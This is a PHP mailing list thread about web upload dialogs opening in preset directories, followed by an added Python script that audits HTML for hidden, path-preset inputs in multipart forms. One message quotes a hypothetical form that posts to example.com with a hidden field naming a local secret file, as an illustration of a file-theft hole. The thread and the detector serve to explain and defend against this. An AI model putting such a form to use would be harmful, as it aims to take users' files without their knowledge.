Are you sure it was not Internet Explorer just showing you the last
directory you had opened with a 'browse...' button within that browsing
session?

Jay Blanchard wrote:
[snip]

Along these same lines, does anyone know how to make the file dialog
start in a specific directory? I saw this the other day but forgot where.
I clicked browse and the dialog popped up pointed to My Pictures (which
at least works for most Windblows users). I meant to look at the code,
but didn't....


Yikes!

If it *DOES* work, you've probably got yet another security problem in
Windows.

Suppose, for example, that I do something like this:

<form action="http://example.com/" method="post"
enctype="multipart/form-data">
<input style="visibility: hidden" name="steal"
value="C:\path\to\commonly\used\secret\file\I\should\not\get.secret">
What's your name? <input name="name"><br />
Who's your daddy? <input name="daddy"><br />
<input type="submit">
</form>

Now, the unsuspecting user will be HANDING me the file I shouldn't
have without ever seeing anything about it.

Even if it "only" lets you pick the directory, but not the file, it
probably exposes too much information about my desktop for my tastes.
[/snip]

Now I need to go back and find it. It was a site having to do with photos,
but I was doing research and visited a lot of them. Since the upload dialog
was looking for photos you can see where the apparent convenience could come
in. But you're right....as a security hole it is big enough for aircraft
carrier usage.


--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
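
Added example, not part of the original thread: a static check a reviewer could run over page markup to catch the pattern in the form quoted above, that is, an input in a multipart form that is hidden from the user and preset to a local path. The names `UploadFormAuditor` and `audit` and the path heuristic are assumptions made for this sketch.

```python
import re
from html.parser import HTMLParser

# Inline styles that keep an input out of the user's sight.
HIDDEN_STYLE = re.compile(r"(visibility\s*:\s*hidden|display\s*:\s*none)", re.I)
# Values shaped like a local path: Windows drive, UNC share, or Unix absolute path.
LOCAL_PATH = re.compile(r"^(?:[A-Za-z]:[\\/]|\\\\|/)")

# Constructed sample: the form from the message above, abbreviated.
SAMPLE = r'''<form action="http://example.com/" method="post"
enctype="multipart/form-data">
<input style="visibility: hidden" name="steal"
value="C:\path\to\commonly\used\secret\file\I\should\not\get.secret">
What's your name? <input name="name"><br />
<input type="submit">
</form>'''


class UploadFormAuditor(HTMLParser):
    """Flags inputs in multipart forms that are hidden and/or preset to a path."""

    def __init__(self):
        super().__init__()
        self.in_multipart = False
        self.findings = []  # list of (input name, reason)

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self.in_multipart = a.get("enctype", "").lower() == "multipart/form-data"
        elif tag == "input" and self.in_multipart:
            kind = a.get("type", "text").lower()
            hidden = ("hidden" in a or kind == "hidden"
                      or bool(HIDDEN_STYLE.search(a.get("style", ""))))
            name = a.get("name", "?")
            if kind == "file" and a.get("value"):
                self.findings.append((name, "file input carries a preset value"))
            if kind == "file" and hidden:
                self.findings.append((name, "file input is hidden from the user"))
            if kind != "file" and hidden and LOCAL_PATH.match(a.get("value", "")):
                self.findings.append((name, "hidden input preset to a local path"))

    def handle_endtag(self, tag):
        if tag == "form":
            self.in_multipart = False


def audit(html):
    auditor = UploadFormAuditor()
    auditor.feed(html)
    return auditor.findings
```

The Unix-path branch of the heuristic will also match hidden fields that hold site-relative URLs, so findings are a prompt for manual review, not a verdict.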